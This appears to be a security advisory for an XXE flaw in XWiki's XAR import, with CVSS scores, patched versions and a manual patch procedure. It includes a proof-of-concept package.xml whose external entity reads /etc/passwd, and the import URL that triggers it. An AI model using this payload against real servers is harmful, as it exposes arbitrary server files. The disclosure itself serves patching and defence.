7.7 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
0.001 Low
EPSS
Percentile
40.4%
Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.
Example to reproduce:
package.xml
content:<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
...
XXE
) as an attachment (e.g. test.xar
).http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar
You’ll then notice that the displayed UI contains the content of the /etc/passwd
file.
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.
You’d need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the XarPackage
java class and then copy the modified version to your WEB-INF/classes
directory (or rebuild the xwiki-platform-xar-model
maven module and replace the one found in WEB-INF/lib/
).
If you have any questions or comments about this advisory: